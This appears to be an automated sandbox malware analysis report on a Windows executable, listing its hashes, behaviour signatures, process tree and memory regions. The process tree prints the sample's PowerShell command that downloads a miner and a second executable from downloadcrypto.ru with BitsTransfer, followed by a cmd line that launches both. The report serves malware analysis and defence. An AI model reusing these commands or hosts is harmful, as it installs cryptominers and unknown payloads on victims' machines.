Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/01/2024, 20:19

General

  • Target

    59531cb95299227ef8a9102fe7b04323.exe

  • Size

    11.4MB

  • MD5

    59531cb95299227ef8a9102fe7b04323

  • SHA1

    028ab74b67c2e3a530bac4bf25ca072049aaee70

  • SHA256

    58ac096c4b57fe64461e8a162889c4c23089bc13ddc1188d0063c2a1169f94b3

  • SHA512

    7fb060f3eb4787293803a43c20978eb17760b74168eea629a79eaed2b41425edd6849f8773c3036449b3286298a4e6395079d9a730f0d684643294842a822472

  • SSDEEP

    196608:k1EwMlSWxlhEu3DPwlhi81/s0d7fpIKFMfDQBJvoRpRkG0kRCIXRV+Yz:k1mlSW/uGDPwLi81/s0V/MLo6XRk+RCM

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://downloadcrypto.ru/soft/nbminer_37.6.exe

exe.dropper

http://downloadcrypto.ru/soft/Weakness.exe

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\59531cb95299227ef8a9102fe7b04323.exe
    "C:\Users\Admin\AppData\Local\Temp\59531cb95299227ef8a9102fe7b04323.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1148
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo tvZeSMv
      2⤵
        PID:4544
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powershell -command If ($env:computername -eq 'DESKTOP-QO5QU33') {exit}; Import-Module BitsTransfer; Start-BitsTransfer -Source http://downloadcrypto.ru/soft/nbminer_37.6.exe,http://downloadcrypto.ru/soft/Weakness.exe -Destination AijormzYrjJ.exe,CDVIeJgPLSLZm.exe;
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1516
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -command If ($env:computername -eq 'DESKTOP-QO5QU33') {exit}; Import-Module BitsTransfer; Start-BitsTransfer -Source http://downloadcrypto.ru/soft/nbminer_37.6.exe,http://downloadcrypto.ru/soft/Weakness.exe -Destination AijormzYrjJ.exe,CDVIeJgPLSLZm.exe;
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3640
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 2292
            4⤵
            • Program crash
            PID:3516
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start AijormzYrjJ.exe & start CDVIeJgPLSLZm.exe
        2⤵
          PID:3904
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3640 -ip 3640
        1⤵
          PID:4284

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b5ayur5n.v4r.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • memory/3640-11-0x0000000006120000-0x0000000006186000-memory.dmp

                Filesize

                408KB

              • memory/3640-23-0x0000000006660000-0x00000000066AC000-memory.dmp

                Filesize

                304KB

              • memory/3640-8-0x0000000005910000-0x0000000005F38000-memory.dmp

                Filesize

                6.2MB

              • memory/3640-7-0x00000000052D0000-0x00000000052E0000-memory.dmp

                Filesize

                64KB

              • memory/3640-9-0x0000000005790000-0x00000000057B2000-memory.dmp

                Filesize

                136KB

              • memory/3640-10-0x00000000060B0000-0x0000000006116000-memory.dmp

                Filesize

                408KB

              • memory/3640-5-0x0000000072CB0000-0x0000000073460000-memory.dmp

                Filesize

                7.7MB

              • memory/3640-4-0x0000000003140000-0x0000000003176000-memory.dmp

                Filesize

                216KB

              • memory/3640-6-0x00000000052D0000-0x00000000052E0000-memory.dmp

                Filesize

                64KB

              • memory/3640-21-0x0000000006190000-0x00000000064E4000-memory.dmp

                Filesize

                3.3MB

              • memory/3640-22-0x0000000006620000-0x000000000663E000-memory.dmp

                Filesize

                120KB

              • memory/3640-24-0x00000000078A0000-0x0000000007936000-memory.dmp

                Filesize

                600KB

              • memory/3640-26-0x0000000006B80000-0x0000000006BA2000-memory.dmp

                Filesize

                136KB

              • memory/3640-27-0x0000000007EF0000-0x0000000008494000-memory.dmp

                Filesize

                5.6MB

              • memory/3640-25-0x0000000006B60000-0x0000000006B7A000-memory.dmp

                Filesize

                104KB

              • memory/3640-28-0x0000000007800000-0x0000000007822000-memory.dmp

                Filesize

                136KB

              • memory/3640-29-0x0000000007880000-0x0000000007894000-memory.dmp

                Filesize

                80KB

              • memory/3640-30-0x0000000072CB0000-0x0000000073460000-memory.dmp

                Filesize

                7.7MB